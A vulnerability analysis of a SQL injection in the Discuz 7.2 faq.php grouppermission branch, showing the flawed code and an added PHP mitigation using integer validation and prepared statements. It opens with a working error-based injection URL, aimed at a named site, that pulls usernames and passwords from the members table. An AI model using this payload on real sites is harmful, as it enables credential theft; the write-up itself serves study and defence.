Analysis of the faq.php SQL injection vulnerability in Discuz 7.2
Injection code example:
https://www.nhooo.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)and(select1from(selectcount(*),concat((select(select(selectconcat(username,0x20,password)fromcdb_memberslimit0,1))from`information_schema`.tableslimit0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)%23
Vulnerability analysis: by phithon

The affected code in faq.php (the grouppermission branch) and the implodeids() helper it calls, reconstructed with whitespace restored:

    if($action == 'grouppermission') {
        ...
        ksort($gids);
        $groupids = array();
        foreach($gids as $row) {
            // $row[0] is the first character of a string value,
            // or the first element of a nested array value
            $groupids[] = $row[0];
        }
        $query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")");
        ...
    }

    // Wraps each value in single quotes and joins them for an IN (...) list;
    // it performs no escaping or type checking of its own
    function implodeids($array) {
        if(!empty($array)) {
            return "'".implode("','", is_array($array) ? $array : array($array))."'";
        } else {
            return '';
        }
    }
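The loop above accepts whatever lands in $row[0] and implodeids() only wraps it in quotes, so the group id list reaches the query without any type check. The following is an added example of the mitigation pattern, not code from Discuz or from phithon's analysis: every group id is coerced to an integer before use, and the IN list is bound through prepared-statement placeholders. The function names sanitizeGroupIds() and buildGroupPermissionQuery() are hypothetical, and the example assumes a PDO connection, which is not what Discuz 7.2 itself uses.

```php
<?php
// Added example (not Discuz code): hardened handling of the gids parameter.
// Group ids are validated as decimal integers before they reach SQL, and the
// IN list is built from placeholders instead of string quoting.

/**
 * Normalise the raw $gids request array into a list of integer group ids.
 * Accepts both shapes the original loop sees via $row[0], a plain value
 * (gids[99]=7) and a one-level nested array (gids[100][0]=7), but only keeps
 * a value when the whole thing is a string of digits (or already an int).
 */
function sanitizeGroupIds($gids): array {
    $out = array();
    foreach ((array)$gids as $row) {
        // Take the same element the original code would look at, but validate
        // the entire value rather than trusting its first character.
        $value = is_array($row) ? reset($row) : $row;
        if (is_int($value) || (is_string($value) && ctype_digit($value))) {
            $out[] = (int)$value;
        }
    }
    return array_values(array_unique($out));
}

/**
 * Build the parameterised query and the values to bind to it.
 * $tablepre is the Discuz table prefix; the returned SQL contains one "?"
 * per group id so no id is ever interpolated into the statement text.
 */
function buildGroupPermissionQuery(array $groupIds, string $tablepre): array {
    if (empty($groupIds)) {
        return array('', array());
    }
    $placeholders = implode(',', array_fill(0, count($groupIds), '?'));
    $sql = "SELECT * FROM {$tablepre}usergroups u "
         . "LEFT JOIN {$tablepre}admingroups a ON u.groupid = a.admingid "
         . "WHERE u.groupid IN ({$placeholders})";
    return array($sql, $groupIds);
}

// Constructed request input: two valid ids (one nested, as gids[100][0] would
// arrive) plus two values that must be dropped (non-numeric and empty).
$gids = array(
    99  => '7',
    100 => array(0 => '12'),
    101 => '7abc',
    102 => '',
);
$ids = sanitizeGroupIds($gids);
list($sql, $params) = buildGroupPermissionQuery($ids, 'cdb_');

// With a PDO connection ($pdo assumed to exist) the ids are bound, never quoted:
// $stmt = $pdo->prepare($sql);
// $stmt->execute($params);
var_dump($ids, $sql, $params);
```

The important difference from implodeids() is that the validation happens on the value's type and full content, not on escaping: a value that is not a decimal integer never becomes part of the statement in any form, and the ids that survive are sent to the server as bound parameters rather than as text inside the SQL string.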